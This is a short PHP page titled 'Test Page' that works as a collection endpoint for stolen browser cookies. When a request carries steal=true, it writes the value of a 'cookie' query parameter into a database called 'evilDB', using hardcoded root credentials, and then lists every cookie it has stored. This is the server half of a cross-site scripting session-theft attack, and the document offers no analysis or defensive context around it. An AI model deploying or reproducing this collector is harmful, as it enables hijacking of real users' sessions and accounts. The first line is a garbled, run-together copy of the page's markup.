<html><head><title>Test Page</title></head><body><?php$conn = ne

1. <html>
2. <head>
3. <title>
4. Test Page
5. </title>
6. </head>
7. <body>
8. <?php
9. $conn = new PDO("mysql:host=localhost;dbname=evilDB","root","secret");
10. echo "connected </br>";
11. if((htmlspecialchars($_GET['steal']) == "true")){
12.     $sql = $conn->prepare("INSERT INTO cookies VALUES (?)");
13.     $sql->execute(array(htmlspecialchars($_GET['cookie'])));
14. }
15. $data = $conn->prepare("SELECT * FROM cookies");
16. $data->execute();
17. foreach($data->fetchAll(PDO::FETCH_ASSOC) as $v) {
18.         echo $v['cookie'] ." </br>";
19. }
20. ?>
21. </body>
22. </html>